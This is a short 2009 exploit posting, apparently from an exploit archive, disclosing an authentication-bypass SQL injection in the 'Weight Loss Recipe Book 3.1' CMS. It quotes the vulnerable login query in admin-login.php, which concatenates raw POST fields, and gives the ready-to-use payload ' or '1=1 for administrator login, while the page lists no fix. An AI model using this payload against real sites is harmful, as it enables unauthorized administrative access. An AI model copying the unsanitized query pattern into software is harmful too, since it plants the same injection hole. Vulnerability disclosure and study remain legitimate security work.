Weight Loss Recipe Book 3.1 (Auth Bypass) SQL Injection Vuln

2009-01-11 06:38:17

###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Emails: [email protected] \ [email protected]
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In \wlrb_files\admin-login.php

SELECT *
FROM ' . $program_prefix . 'administrators
WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';

Exploit: ' or '1=1

##############################

Greetz: EdGaR :P

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.